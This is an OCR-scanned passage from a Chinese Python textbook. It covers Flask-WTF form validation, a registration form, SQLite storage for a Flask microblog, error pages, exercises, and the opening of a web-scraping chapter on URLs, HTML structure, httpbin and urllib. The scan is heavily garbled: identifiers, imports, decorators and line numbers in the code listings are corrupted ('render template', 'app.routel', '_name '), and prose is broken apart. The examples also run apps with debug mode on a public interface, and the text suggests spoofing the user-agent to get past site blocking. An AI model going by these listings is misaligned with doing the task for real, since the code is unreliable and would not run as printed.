Length(min= —1, max= —1, message= None) 验证 输入 字符 串 的 长 度 
MacAddress(message 一 None) 验证 MAC 地 址 
NumberR: (min= None, = None, Ssage 一 

umberRange(min 一 None，max 一 None，message 验证 输入 的 值 在 数字 范围 内 
None) 
Optional 无 输入 值 时 跳 过 其 他 验证 函数 
Required(message 一 None) 确保 字段 中 有 数据 
Regexp(regexp，flags 一 0，message 一 None) 使 用 正则 表达 式 验证 输入 值 
URL(require_tld= True, message— None) 验证 URL 
AnyOf(values，message 一 None, values_formatter= 确保 输入 值 在 可 选 值 列表 中 
None) 
NoneOf( values, message = None，values_formatter 一 确保 输入 值 不 在 可 选 值 列表 中 


None) 





上 面 的 示例 使 用 Flask-WTF 实现 了 字段 数据 的 验证 ,但 验证 失败 后 ,表单 中 未 显示 任 
何 提示 信息 ,还 不 够 人 性 化 。 下 面 以 一 个 注册 模块 为 例 , 说 明 Flask-WTF 的 使 用 方法 。 








wtfregister. py】 


1 from flask import Flask, render template, redirect 

2. from flask wtf import FlaskForm 

3. from wtforms import StringField, PasswordField, BooleanField 
4 from wtforms. validators import Required, Length, EqualTo, Email 
5. import os 

6 

7. app = Flask(_name ) 

8. #app.secret key = os.urandom(24) 

9. app.config[ 'SECRET KEY'] = os.urandom(24) 


11. class RegisterForm(FlaskForm): 

442; name = StringField(' 登 录 名 : '，validators = [Required(message = ' 登 录 名 不 能 为 空 ')]) 
13. password = PasswordField( ' 密 码 : '，validators = [Required( ),EqualTo( 'confirmpassword'， 
message = ' 密 码 必须 相同 ') ]) 

14. confirmpassword = PasswordField(' 密 码 : ', validators = [Required(),Length(min= 6,max = 
35, message = ' 密 码 字符 数 为 6 一 35 个 ')]) 

15. email = StringField('Email 地 址 : ', validators = [Required(), Email(message = 'Email 信息 
有 误 ')]) 

16. accept_tos = BooleanField(' 我 接受 协议 条 款 '，validators = [Required(message = ' 请 选择 是 
否 同意 协议 条 款 ')]) 

3 

18. @app.routel('/register', methods = ('GET', 'POST')) 

19, def submit(): 


20. form = RegisterForm() 

2 if form. validate_on_submit( ) : 

ee return ' 嗨 %s 你 好 ,你 已 成 功 注册 成 为 会 员 了 ! ' % form. name. data 
Es: return render templatel( 'register. htm]', form= form) 

24. 

25. if _name ==" main_": 

26. app. run( debug = True) 


以 上 的 验证 函数 中 还 加 入 了 message 信息 , 它 是 用 于 在 验证 失败 后 的 提示 信息 。 
为 更 简单 .更 精确 地 生成 表单 ,这 里 创建 一 个 宏 ,用 于 显示 表单 中 字段 的 标签 .字段 、 错 


误 信 息 。 


宏 【_formhelpers. html】 


Ea {% macro render field(field) %} 

1 <dt>{{ field. label }} 

3 <dd>{{ field( * * kwargs) |safe }} 
4 {% if field.errors %} 

5. <ul class = errors> 

6 {% for error in field.errors %} 
2 <1i>{{ error }}</1i> 

8 {% endfor $%} 

9 </ul> 

10. {% endif %} 

1 </dd> 

12. {% endmacro $%} 
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register. html 表单 : 


10. 
12, 


{% from" formhelpers.html" import render field %} 
< form method = post action = "/register"> 
<dl> 
{{ form. hidden tag() }} 
{{ render field(form. name) }} 
{{ render field(form. password) }} 
{{ render field(form. confirmpassword) }} 
{{ render field(form. email) }} 
{{ render field(form.accept tos) }}</dl> 
<p>< input type = submit value = 提交 > 
</form> 


在 浏览 器 中 输入 http://127. 0.0.1:5000/register, 就 能 显示 一 个 注册 表单 了 ,并 且 具 
有 了 验证 功能 : 登录 名 不 能 为 空 ,密码 与 验证 密码 必须 一 致 且 长 度 为 6 一 35 个 字符 ,E-mail 
的 格式 必须 正确 ,协议 条 款 必 选 。 当 用 户 输入 错误 的 时 候 , 还 会 提示 错误 信息 。 


13.2.4 连接 数据 库 
数据 库 是 应 用 程序 数据 持久 化 的 重要 手段 ,下 面 以 使 用 SQLite 3 数据 库 为 例 介绍 
Flask 中 数据 库 的 使 用 方法 。 


1. 创建 数据 库 


在 Python 环境 下 ,创建 数据 库 。 
例 [SQLiteOp. py】 


闫 一 和 = wading:utf=8 = = 

import sqlite3,os 

basedir = os.path.abspath(os.path. dirname(_ file_ )) 
DATABASE URI = os.path. join(basedir, ‘appdb. db') 


SQL=""" 

drop table if exists posts; 

create table posts ( 
id integer primary key autoincrement, 
title string not null, 
text string not null 

); 


.insert into posts(title, text) values( ' 海 岛 休闲 一 日 游 !', ' 大 海 ,你 好 !'); 
.insert into posts(title, text) values( ' 密 林 探 险 三 日 游 !', ' 密 林 啊 ,我 来 了 ! '); 


. def connect db(): 


return sqlite3. connect (DATABASE URI) 


. def init db(): 


db = connect db() 
db. cursor(). executescript (SQL) 
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人 db. commit() 

24. db. close() 

25. 

26. if name ==" main ": 
27. init_db() 


该 程序 提供 了 两 个 函数 : connect_db() 函 数 用 于 连接 数据 库 ; init_db() 函 数 用 于 数据 
库 的 初始 化 。 程 序 会 在 其 目录 下 创建 一 个 appdb. db 数据 库 。 

(各 说 明 : 第 3 行 ,获取 程序 所 在 的 目录 名 。os. path. dirname(_file_) 函 数 用 于 获取 
程序 所 在 的 路 径 ,os. path. abspath() 函 数 用 于 获取 目录 的 绝对 路 径 。 

第 4 行 , 形 成 数据 库 的 完整 路 径 。 

第 6 一 15 行 ,定义 了 一 个 创建 数据 表 的 语句 ,并 插入 两 条 数据 。 

该 程序 可 以 在 ide 环境 下 直接 运行 ,也 可 以 在 命令 行 下 运行 。 下 面 以 命令 行 方式 运行 。 

C:\Python34\microblog > python 


>>> from SQLiteOp import init db 
>>> init_db() 


程序 的 执行 结果 是 在 其 目录 下 创建 一 个 名 为 appdb. db 的 数据 库 。 

2. Flask 中 连接 数据 库 

在 前 面 已 经 创建 了 数据 库 ,也 编制 了 连接 数据 库 的 函数 , 接 下 来 就 该 在 Flask 中 连接 数 
据 库 了 。 在 Flask Web 应 用 中 所 有 的 模块 都 要 连接 数据 库 , 使 用 完毕 后 都 要 关闭 数据 库 连 
接 , 因 此 ,把 数据 库 连 接 放 在 所 有 Web 请 求 之 前 ,关闭 数据 库 连 接 放 在 所 有 Web 请 求 关 闭 
之 后 。 在 Flask 中 有 before_request() ,after_request() 和 teardown_request() 装 饰 器 来 实 
现 该 功能 。 

使 用 before_request() 装 饰 器 的 函数 会 在 请 求 之 前 被 调用 旦 不 带 参 数 。 使 用 after_ 
request( ) 装饰 器 的 函数 会 在 请 求 之 后 被 调用 且 传 人 将 要 发 给 客户 端的 响应 。 使 用 
teardown_request() 装 饰 器 的 函数 将 在 响应 构造 后 执行 ,并 不 允许 修改 请 求 ,返回 的 值 会 被 
忽略 。 

@app. before_request 


def before request(): 
g.db = connect db() 


@app. teardown_request 
def teardown request(exception): 
g.db.close() 


3. 显示 条 目 

在 13. 2. 2 小 节 的 index03. html 文档 中 使 用 了 字典 来 传输 数据 ,下 面 使 用 模板 显示 数 
据 库 中 的 微 博信 息 。 

例 [listpost. py】 


1. 间 -*— coding:utf-8 一 * 一 
2. from flask import Flask, render template, request,g 
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3 import os 

4. from SQLiteOp import connect db 
多 

6. user = { 'nickname': ' 李 四 '} 

7 

8. app = Flask(_ name ) 

9 

10. (@app. before request 


11. def before request(): 
32， g.db = connect db() 


14. @app.teardown request 
15. def teardown request(exception): 
16. g.db. close() 


18. @app.routel( '/listpost') 
19. def listpost(): 


20. cur = g.db.execute('select title, text from posts order by id desc') 

2 posts = [dict(title = row[0], text = row[1]) for row in cur. fetchall()] 

22. return render template('listpost.html',title = ' 首 页 ', user = user, posts = posts) 
23. 

24. if name == ' main ': 

> app. run( host = '0.0.0.0',port = 80, debug = True) 


全 说 明 : 第 2 行 ,从 Flask 包 导 入 对 象 g, 它 在 所 有 的 函数 里 都 可 用 ,即使 在 多 线程 环 
境 下 g 也 是 全 局 可 见 的 ,但 这 个 对 象 只 能 保存 一 次 请 求 的 信息 。 

第 10 行 ,用 @app. before_request 装饰 符 修饰 before_request() 函 数 , 意 味 着 该 函数 将 
会 在 请 求 之 前 被 调用 。 

第 12 行 ,把 数据 库 的 连接 对 象 赋 给 了 全 局 变量 g. db。 

第 14 行 ,用 @teardown_request 装饰 符 修饰 teardown_request() 函 数 ,意味 着 该 函数 
将 会 在 请 求 构 造 之 后 被 调用 。 这 里 的 teardown_request() 函数 会 关闭 数据 库 连接 。 

第 20 行 ,通过 g. db 数据 库 连 接 执行 一 条 查询 语句 ,并 把 形成 的 游标 赋 给 cur。 

第 21 行 , 执 行 for row in cur. fetchall() 循 环 , 把 row[0] 赋 值 给 字典 的 title,row[1] 赋 
值 给 字典 的 text, 并 把 多 个 字典 形成 一 个 列表 。 

第 22 行 , 调 用 模板 listpost. html, 并 传递 参数 title、user、posts。 

例 [listpost. html】 
{% extends "base.html” %} 
{% block content %} 
<hl > 欢迎 ，{{fuser. nickname}}!</hl > 
{% for post in posts %} 
<div><p>{{post. title}}: <b>{{post. text}}</b></p></div> 
{% endfor %S} 
{% endblock $%} 

微 博 的 显示 模块 显示 了 数据 库 中 的 微 博 条 目 , 接 下 来 设计 一 个 增加 微 博 的 功能 模块 。 
其 实质 就 是 一 个 表单 ,通过 表单 提交 数据 ,然后 存 人 数据 库 。 


ou wm PP 
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模板 【addpost. html】 


1. <html > 

2. <head> 

3. <meta http - equiv= "Content - Type" content = "text/html; charset = UTF— 8" /> 
4. <title> 添 加 微 博 </title> 

5. </head> 
6 

和 

8 

9 


<body> 
<h3>{{addpost message}}</h3> 
< form id= "forml" name = "addpost" method = "post" action = ""> 


10. ”题目 : 


11. < input name = "title" type = "text" value = "请 输入 微 博 标题 " /> 
Ey <p> 

13， 内 容 : 

14. < textarea name = "text”rows = "4"> 这 里 是 微 博 内 容 。</textarea> 
15. </p> 

20, <p> 

17. < input type = "submit" name = "Submit" value = "提交 " /> 

18. </p> 

19. </form> 

20. </body> 

21. </html> 


(本 说 明 : 第 8 行 ,定义 了 一 个 变量 {{addpost_message) } 用 于 显示 提示 信息 。 
第 9 一 19 行 ,定义 了 一 个 表单 ,其 中 第 11 行 用 于 输入 标题 ,name 一 "title"; 第 14 行 用 
于 输入 微 博 内 容 ,name 一 "text"。 
例 【[addpost. py】 
间 一 关 一 coding:utf-8 一 * 一 


from flask import Flask, render template,g, request, redirect,url for 
from SQLiteOp import connect db 


user = { 'nickname': ' 李 四 "} 


2 

3 

4 

5. app = Flask(_name ) 
6 

8. (@app.before request 

9. def before request(): 

10. g.db = connect db() 

12. (@app. teardown request 

13. def teardown request(exception): 
14. g. db. close() 


16. @app.route('/listpost') 
17. def listpost(): 


18. cur = g.db.executel('select title, text from posts order by id desc') 
19, posts = [dict(title= row[0], text = row[1]) for row in cur.fetchall()] 
20. return render template( 'listpost. html',title = ' 首 页 ', user = user, posts= posts) 
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22. @app. route( '/addpost', methods = ['GET', 'POST']) 
23. def addpost(): 


24. if request. method == "GET': 

25. return render_template("addpost. html",addpost_message = "请 输入 标题 和 内 容 并 提 
交 史 

26. elif request. method == 'POST': 

27. 1 title= request. form. get( 'title', 'not found') 

28. 1 text = request. form. get( 'text', 'not found') 

29. if 1_ title!= ' 请 输入 微 博 标 题 'and 1_text!= ' 这 里 是 微 博 内 容 。': 

30. g. db. execute( 'insert into posts (title, text) values(?,?)',[]1 title,1_text]) 
31. g.db. commit() 

32, return redirect(url for('listpost')) 

33. return render_template("addpost.html",addpost_message = "请 输入 标题 和 内 容重 新 
提交 ") 

34. 

35. if name == ' main_': 

36. app. run( host = '0.0.0.0',port = 80, debug = True) 


(可 说 明 : 该 程序 定义 了 /addpost 路 由 器 ,HTTP 方法 为 GETCO) 和 POSTO)。 

第 24 行 第 25 行 ,判断 若 HTTP 方法 为 GET() , 则 将 模板 addpost. html 传 给 客户 。 
第 26 行 ,判断 若 HTTP 方法 为 POST() , 则 接收 表单 数据 。 

第 27 行 ,获取 表单 的 title 值 。 

第 28 行 , 获 取 表 单 的 text 值 。 

第 29 行 ,判断 title 和 text 的 值 是 否 为 默认 值 。 

第 30 行 ,将 获取 的 title 和 text 值 插 入 数据 库 的 表 中 。 

第 31 行 ,提交 事务 ,将 数据 存 入 数据 库 。 

第 32 行 , 重 定 向 到 路 由 listpost, 显 示 微 博 数据 。 

第 33 行 , 若 提交 的 表单 数据 为 默认 值 , 则 提示 客户 重新 填写 提交 。 


13.2.5 其 他 附加 功能 


1. 错误 页 面 

HTTP 是 请 求 与 应 答 模式 的 ,客户 端 提出 Web 请 求 ,服务 器 端 应 答 一 个 Web 页 面 。 客 
户 请 求 的 页 面 出 现 不 存在 等 错误 时 ,可 以 用 自 定义 的 错误 页 面 传输 给 客户 。Flask 中 
errorhandler() 装 饰 器 就 是 具有 这 种 功能 的 。 代 码 如 下 : 

@app.errorhandler(404) 


def page not found(error): 
return render template( '404. html'), 404 


当 系 统 中 出 现 客户 请 求 的 页 面 不 存在 时 ,就 把 模板 page_not_found. html 传输 给 客户 ， 
当然 也 可 以 处 理 其 他 的 一 些 错 误 , 只 要 使 用 errorhandler() 装 饰 器 ,把 相应 的 错误 代码 传 过 
去 就 可 以 了 。 

2. Flash 消息 闪现 

Web 应 用 系统 通常 都 有 与 用 户 交互 的 渠道 ,Flask 提供 了 一 种 非常 简单 的 方法 传递 信 
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息 给 用 户 。Flash 消息 闪现 系统 基本 上 使 在 请 求 结束 时 记录 信息 并 在 下 一 个 ( 且 仅 在 下 一 
个 ) 请 求 中 访问 。 通 常 结合 模板 布局 来 显示 消息 。 

使 用 flash() 方 法 来 闪现 一 条 消息 ,使 用 get_flashed_messages() 函 数 能 够 获取 消息 ， 
get_flashed_messages() 函 数 也 能 用 于 模板 中 。 详 细 的 代码 请 参见 本 教程 的 完整 示例 。 

3. 给 页 面 加 个 图 标 

“页 面 图 标 ? 是 浏览 器 在 标签 或 书签 中 使 用 的 图 标 , 它 可 以 给 你 的 网 站 加 上 一 个 唯一 的 
标识 ,方便 区 别 于 其 他 网 站 。 一 般 的 图 标 是 16 X16 像素 的 ICO 格式 文件 。 当 然 这 不 是 规 
定 的 ,但 却 是 一 个 所 有 浏览 器 都 支持 的 事实 上 的 标准 。 把 ICO 格式 文件 命名 为 favicon. ico 
并 放 入 static 目录 中 ,然后 在 html 文件 中 添加 一 个 链接 ,如 : 


< link rel = "shortcut icon" href ="{{ url for('static', filename = 'favicon. ico') }}"> 

这 个 链接 并 不 是 所 有 浏览 器 都 支持 的 ,比如 一 些 老 掉 牙 的 浏览 器 就 不 支持 。 

莒 提示 :本章 代 码 等 资源 请 见 本 书 附件 ch13web/webapp 文件 天 , 另 有 基于 Flask 杠 
架 的 微 博 例 程 ,由 于 篇 幅 原 因 , 这 里 不 再 丙 述 ,请 参见 本 书 附 件 ch13web/microblog 文件 夹 。 


习 题 


一 、 判断 题 
1. HTML 生成 的 网 页 可 以 访问 数据 库 , 显 示 动 态 网 页 。 
2. 网 络 客 户 端 可 以 通过 表单 的 方式 向 服务 器 端 提交 数据 。 
3. Web 应 用 使 用 的 HTTP 采用 了 简单 的 请 求 -响应 模式 。 
4. Flask 框架 以 其 灵活 ,简便 而 受到 开发 人 员 的 欢迎 。 
5. Diango 是 Python 中 的 重量 级 的 Web 开发 框架 。 
6. Flask 以 函数 修饰 符 来 标明 函数 有 Web 应 用 中 的 作用 。 
二 、 选 择 题 
1. 下 列 不 是 Python 常见 的 Web 框架 的 是 ( Xe 

A. Django B. Flask C. Tornado D. Struts2 
2. Flask 中 使 用 ( ) 修 饰 客户 将 要 访问 的 URL 函数 。 

A. @static B. @app.route() CC. @global D. @public 
3. Web 应 用 中 用 于 存放 模板 的 文件 夹 为 ( ww 

A. config B. static C. templates D. tmp 
4. 模板 中 用 于 表示 模板 变量 的 符号 为 ( Ne 

A. {{ 变 量 名 )} B. [变量 名 ] C. (变量 名 ) D. 二 变量 名 二 
5. 模板 中 用 于 流程 控制 的 语句 应 放 在 ( ) 中 。 

A. {% %} B. [% %] Cs (% %) D; <% %> 
6. 在 HTTP 提交 数据 的 方法 中 相对 较为 安全 的 方法 是 ( Wa, 

A. GET() B. POSTO) C. PUTO D; DELETE() 
7. 在 Flask 框架 的 Web 应 用 中 ,用 ( ) 修 饰 自 定义 错误 页 面 。 


2 
二 ~ 一 ~ ~ 一 
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A. @app. errorhandler(404) B. @app. route('404') 
C. @app. route(l 'error') D. @app. errorpage('404') 
三 、 编程 题 


1. 模仿 本 书 案例 设计 一 个 个 人 微 博 网 站 。 
2. 使 用 Flask 框架 设计 一 个 简单 的 个 人 网 站 ,要 求 使 用 数据 库 ,模板 等 。 


14.1 网 络 基础 


随 着 互联 网 的 发 展 ,基于 网 络 的 应 用 也 越 来 越 广 ,其 中 Web 应 用 是 网 络 中 应 用 最 广泛 
的 一 种 ,Web 应 用 使 用 了 HTTP( 超 文本 传输 协议 ), 它 采用 请 求 -响应 模式 ,客户 端 提出 请 
求 , 服 务 器 端 给 出 响应 ,传输 的 内 容 是 用 HTML 描述 的 超 文本 文件 。Web 资源 的 信息 量 
是 海量 的 , 抓 取 Web 数据 是 获取 网 络 信息 的 重要 途径 ,本 章 将 介绍 网 络 数 据 抓 取 的 基础 
知识 。 


14.1.1 URI 与 URL 


Web 应 用 中 有 两 个 重要 的 概念 ,一 个 是 最 常见 的 URL, 另 一 个 是 URI。URL 是 URI 
的 子 集 。 

URICUniform Resource Identifier, 通 用 资源 标识 符 ) 是 一 个 用 于 标识 某 一 互联 网 资源 
名 称 的 字符 串 。 该 种 标识 允许 用 户 对 任何 (包括 本 地 和 互联 网 ) 的 资源 通过 特定 的 协议 进行 
交互 操作 。URI 一 般 由 三 部 分 组 成 : 访问 资源 的 命名 机 制 ; @ 存 放 资 源 的 主机 名 ; @ 资 
源 自身 的 名 称 ,由 路 径 表 示 。 如 : 


http://news. xinhuanet. com/world/2015-06/28/c_1115746629. htm 


http 是 访问 资源 的 协议 ; news. xinhuanet. com 是 主机 ; world/2015-06/28/c_ 
1115746629. htm 是 资源 的 路 径 与 名 称 。 下 面 是 另外 一 些 URI: 

mailto:joe@126. com 指向 一 个 用 户 的 邮箱 

file:///usr/share/doc/HTML/index. html 指 本 机 /usr/share/doc/HTML/ 目 录 下 
的 一 个 网 页 文件 

URL(Uniform Resource Locator, 统 一 资源 定位 器 ) 是 WWW 中 网 页 的 地 址 ,采用 
URL 可 以 用 一 种 统一 的 格式 来 描述 各 种 信息 资源 ,包括 文件 .服务 器 的 地 址 和 目录 等 。 它 
的 格式 是 : 
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协议 : // 主 机 : 端口 /地 址 


比如 : 

http://www. pku. edu. cn/。 
http://gopher. quux. org:70/。 
ftp://192. 168. 1. 8/readme. txt。 


14.1.2 网 页 的 结构 


通过 第 13 章 的 讲述 ,已 经 了 解 了 Web 的 基础 知识 、 网 页 制作 和 发 布 的 相关 知识 ,其 实 
WWW 服务 器 发 送 的 网 页 是 由 HTML 文件 、JavaScript 文件 .CSS 文件 .图 片 . 音 视频 文件 
等 组 成 。 经 过 浏览 器 解析 后 ,看 到 的 就 是 绚烂 缤纷 的 网 页 了 。 看 到 的 网 页 实质 是 由 HTML 
代码 构成 骨架 ,由 文字 、 图 片 . 音 视频 构成 网 页 的 肉 , 青 由 JavaScript 和 CSS 进行 润色 ,这 样 
看 到 的 网 页 就 鲜 活 起 来 了 。 进 行 网 页 的 抓 取 ,就 是 要 对 HTML 代码 进行 分 析 , 从 网 页 这 个 
大 骨架 中 取出 文字 、 图 片 . 音 视 频 等 资源 ,因此 ,有 必要 简单 介绍 一 下 HTML 文件 的 结构 。 

下 面 来 看 一 个 简单 的 index. html 文件 : 

<! DOCTYPE html > 

<html> 

<head> 

<meta http - equiv = "Content - Type" content = "text/html; charset = UTF - 8" /> 

<title> HTML 结构 示例 </title> 

</head> 

< body > 

< img src = "image01.png" width= "104" height = "142"> 
<hl > 我 的 第 一 个 标题 </hl > 
<p> 我 的 第 一 个 段落 。</p> 
<a href = "http://www.tsinghua. edu. cn/"> 清 华 大 学 </a> 

</body> 

</html > 

结构 解析 : 

2 二 ! DOCTYPE html> 声 明 为 HTML 文档 ; 

去 html> 与 二 /html> 之 间 的 文本 描述 网 页 ; 

所 head 盖 与 二 /head 盖 之 间 包 含 了 文档 的 元 (Meta) 数 据 ; 
二 title 志 与 之 /title 二 之 间 描 述 了 网 页 的 标题 ; 

去 body> 与 二 /body> 之 间 的 文本 是 可 见 的 页 面 内 容 ; 
二 img src 二 ... 记 描述 了 一 张 图 片 ; 

所 hl 二 与 二 /hl 之 间 的 文本 被 显示 为 标题 ; 

去 p> 与 所/p> 之 间 的 文本 被 显示 为 段落 ; 

2 <a href=="...">... 二 /a 二 之 间 描 述 了 一 条 超级 链接 。 

图 14-1 所 示 的 图 片 显 示 了 该 网 页 的 可 视 化 结构 。 

万 维 网 联盟 (W3C) 使 用 文档 对 象 模 型 (DOM) 定 义 了 访问 HTML 文档 的 标准 ,并 将 
HTML 文档 视 作 树 结构 , 称 为 节点 树 ,HTML 文档 中 的 所 有 内 容 都 是 节点 。 

2 整个 文档 是 一 个 文档 节点 。 


0 0 0 0 
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<html> 
<head> 
<title>...</title> 
</head> 
<body> 
<img src=...> 
<hl>...</hl> 
<p>.…</p> 
<a href="...">...</a> 
</body> 
</html> 


图 14-1 网 页 结构 示意 图 


2 每 个 HTML 元 素 是 元 素 节点 。 

2 HTML 元 素 内 的 文本 是 文本 节点 。 
2 每 个 HTML 属性 是 属性 节点 。 
HTML 节点 树 如 图 14-2 所 示 。 































































































文档 
根 元 素 
<html> 
素 元 素 : 
<head > <body> 
[ ] 
元 素 : 元 素 : 元 素 : 元 素 : 元 素 : 
<title> <img> <h1> <p> <a> 
| 
文本 : 文本 : 文本 : 文本 : 文本 : 
文档 标题 图 片 文件 名 标题 文本 段落 文本 链接 文本 








图 14-2 HTML 节点 树 示意 图 


节点 树 中 的 节点 彼此 拥有 层级 关系 。 

父 (parent) 、 子 (child) 和 同胞 (sibling) 等 术语 用 于 描述 这 些 关 系 。 父 节点 拥有 子 节点 。 
同 级 的 子 节点 被 称 为 同胞 (兄弟 或 姐妹 )。 在 节点 树 中 ,顶端 节点 被 称 为 根 (root); 每 个 节 
点 都 有 父 节点 、 除 了 根 ( 它 没有 父 节 点 ) ,一 个 父 节点 可 拥有 任意 数量 的 子 节点 ,同胞 是 拥有 
相同 父 节点 的 节点 。 

图 14-3 展示 了 节点 树 的 一 部 分 以 及 节点 之 间 的 关系 。 







































































一 parent node 
根 元 素 : 
<html> 
first child 区 是 
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员 有 元 素 : 名 
一 parent 
last child 元 素 : > Re 
<body> ek 
i 元 素 : 
children A 
图 14-3 节点 间 关 系 示 意图 


14.1.3 测试 网 站 的 使 用 及 架设 


为 了 测试 文件 上 传 ,这 里 使 用 一 个 开源 的 测试 网 站 ,测试 者 可 以 放心 大 胆 地 黑 它 ,而 不 
用 担心 它 报复 你 。 它 有 点 像 一 个 蜜 镀 ,时 刻 等 待 着 你 的 光临 ,然后 根据 你 的 请 求 ,给 你 返回 你 
想 要 的 东西 。 官 方 测试 地 址 为 http://httpbin. org/, 表 14-1 列 出 了 httpbin 常用 的 接口 列表 。 























表 14-1 httpbin 常用 的 接口 列表 

接 点 描述 
/ 测试 首页 
/ip 返回 服务 器 IP 
/user-agent 返回 user-agent 
/headers 返回 headers 字典 
/get 返回 GET 数据 
/post 返回 POST 数据 
/cookies 返回 Cookies 数据 





/cookies/set? name 一 value 


设置 一 个 或 多 个 简单 Cookies 

















/html 提供 一 个 HTML 网 页 

/robots. txt 返回 一 些 robots. txt 规则 

/links/ :n 返回 包含 n 个 HTML 链接 的 网 页 
/forms/ post 提交 到 /post 的 HTML 表单 

/xml 返回 一 些 XML 





如 果 暂 时 不 能 上 网 ,也 可 以 自己 架设 httpbin 测试 网 站 ,在 Linux 下 使 用 以 下 命令 安装 : 


$ pip install httpbin 
$ pip install gunicorn 


启动 Web 服务 ,运行 httpbin: 


$ gunicorn - b:8000 httpbin:app 


其 中 ,gunicorn 是 一 个 Python WSGI HTTP Server for UNIX, 所 以 在 Windows 下 安 
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装 不 会 成 功 。-b:80 指定 使 用 的 端口 号 为 80 ,默认 端口 为 8000。 
然后 ,打开 浏览 器 ,在 地 址 栏 中 输入 http://ip:8000, 就 可 以 看 到 与 官方 网 站 http:// 
httpbin. org/ 一 样 的 测试 网 站 了 。 


14.2 使 用 urllib 包 抓 取 分 析 网 页 


Python 3 中 的 urllib 模块 允许 通过 程序 访问 Web 网 站 , 它 为 程序 打开 了 通 向 互联 网 之 
门 。Python 3 中 的 urllib 不 同 于 Python 2 中 的 urllib 2, 但 它们 大 部 分 还 是 相同 的 。 通 过 
urllib 可 以 访问 Web 网 站 .下 载 数据 解析 数据 ,修改 标 头 、 执 行 GET/POST 请 求 等 。 

一 些 网 站 是 不 赞成 用 程序 访问 它们 数据 的 , 当 发 现 有 一 个 程序 访问 它们 网 站 的 时 候 , 它 
们 会 阻塞 程序 ,或 提供 一 些 不 同 的 数据 。 这 是 非常 令 人 讨厌 的 ,这 时 就 需要 修改 代码 避免 这 
类 现象 的 发 生 。 通 过 修改 发 送 给 服务 器 的 标 头 中 的 user-agent 变量 ,让 服务 器 知道 是 一 个 
Python 程序 在 访问 网 站 ,也 可 以 让 服务 器 认为 访问 者 就 是 一 个 IE 用 户 .Chrome 用 户 或 任 
何 真实 的 东西 。 

既然 urllib 能 够 做 这 些 事 情 , 下 面 就 来 学 习 一 下 urllib。urllib 包 中 变 括 了 以 下 4 个 与 
URL 有 关 的 模块 。 

(1) urllib. request: 用 于 打开 和 读 取 URL 资源 。 

(2) urllib. error: 包含 了 urllib. request 抛 出 的 异常 。 

(3) urllib. parse: 用 于 解析 URL 资源 。 

(4) urllib. robotparser: 用 于 解析 网 站 的 robots. txt 文件 ,以 便 决定 是 否 抓 取 网 站 的 内 容 。 


14.2.1 urllib. request 模块 


urllib. request 模块 中 定义 了 一 些 用 于 打开 URL( 通 常 是 HTTP 的 ) 资 源 的 函数 和 类 ， 
包括 基本 功能 ,数字 认 证 、 重 定向 ,Cookies 等 。Request 模块 有 一 个 重要 的 函数 urlopen(), 下 
面 是 它 的 说 明 。 

urlopen (url, data = None, [timeout, ] *, cafile = None, capath = None, cadefault = False, 

context = None) 

打开 URL, 该 URL 可 能 是 字符 串 或 者 是 Request 对 象 。 该 函数 的 返回 值 为 urllib. 
response. addinfourl 对 象 。 该 对 象 拥有 以 下 函数 。 

2 read(): 读 取 Request 对 象 的 内 容 。 

2 geturl(): 返回 检索 资源 的 URL。 

9 info(): 返回 网 页 的 元 信息 (Meta) ,如 headers。 

9 getcode(): 返回 response( 响 应 ) 的 HTTP 状态 代码 。 

Request 模块 的 对 象 如 下 。 

2 full_url: 该 属性 用 于 获取 原始 的 URL ,该 URL 是 分 段 的 。 

9 type: URI 策略 。 

9 host: 主机 ,也 可 能 包含 用 冒号 分 开 的 端口 。 

2 origin_req_host: 不 带 端口 号 的 主机 。 
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selector: URI 路 径 , 如 果 Request 使 用 了 代理 ,select 会 是 传 给 代理 的 完整 URL。 
data: Request 的 主体 。 
method: 标识 HTTP 请 求 方法 的 字符 串 。 
get_method(): 返回 一 个 指示 HTTP 请 求 方法 的 字符 串 。 如 果 request. data 是 
None 则 返回 'GET' ,否则 返回 'POST', 这 仅 对 HTTP 请 求 有 意义 。 
add_header(key, val) : 往 请 求 中 添加 标 头 。 标 头 仅 能 被 HTTP 处 理 器 处 理 , 并 且 
标 头 名 不 能 重 名 ,否则 前 面 的 值 会 被 后 面 的 值 覆盖 。 
has_header(header) : 检测 实例 中 是 否 有 指定 的 标 头 。 
remove_header(header) : 从 请 求实 例 中 删除 指定 的 标 头 。 
set_proxy(host，type) : 准备 连接 到 代理 服务 器 的 申请 。 
get_header(header_name, default 二 None): 返回 给 标 头 的 值 ,如 果 头 未 出 现 则 返回 
默认 值 。 

9 header_items(); 返回 请 求 头 的 (header_name，header_value) 数 组 列表 。 
示例 : 


© 


Ooo oOc 


>>> import urllib. request 

>>> url = 'http://www. baidu. com' 

>>> bd_request = urllib.request.urlopen(url) 
>>> bd_request. status 


200 # 表明 服 务 器 已 经 成 功 处 理 并 返回 了 网 页 
>>> type(bd_request) 


<class 'http. client. HTTPResponse'># 返 回 的 对 象 类 型 


>>> bd_request. geturl() 


‘http: //www. baidu. com' 


>>> bd_request. info() 


< http.client. HTTPMessage object at 0x00000000035B7668 > 


>>> html = bd_request. read() 
>>> print(html1) 


b'<! DOCTYPE html ><! —— STATUS OK —— >< html > < head > < meta http - equiv = "content — type" 
content = "text/html;charset = UTF - 8"><meta http - equiv = "X- UR- Compatible" content = "IE 
= Edge">< meta content = "always" name = "referrer">< meta name = "theme — color" content ="# 
2932el">< link rel = "shortcut icon" href = "/favicon. ico" type = "image/x— icon" />< link rel 
="icon" sizes ="any" mask href = "//www. baidu. com/img/baidu. svg"> < link rel ="dns— 
prefetch" href ="//sl.bdstatic. com"/>< link rel = "dns - prefetch" href = "//t1. baidu. com"/>< 
link rel = "dns - prefetch" href = "//t2.baidu. com"/>< link rel = "dns - prefetch" href = "//t3. 
baidu. com"/> < link rel = "dns - prefetch" href = "//t10. baidu. com"/> < link rel ="dns— 
prefetch" href = "//t11. baidu. com"/>< link rel = "dns - prefetch" href = "//t12. baidu. com"/>< 
link rel = "dns - prefetch" href = "//bl. bdstatic. com"/><title>\xe7\x99\xbe\xe5\xba\xa6\xe4\ 
xb8\x80\xe4\xb8\x8b\xef\xbc\x8c\xe4\xbd\xa0\xe5\xb0\xbl\xe7\x9f\xa5\xe9\x81\x93 </title> 
\n< style index = "index" id = "css_index"> html, body{height:100% }html{overflow— y:auto} # 
wrapper{position: relative; position:;min— height:100%}# head{padding - bottom:100px; text 
—align:center; *z" 
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中 的 文字 都 是 以 十 六 进 制 的 方式 显示 的 ,这 
不 是 我 们 所 希望 的 ,这 时 就 需要 对 返回 的 网 页 进行 解码 ,使 用 下 面 的 代码 就 可 以 正确 显示 
页 面 。 


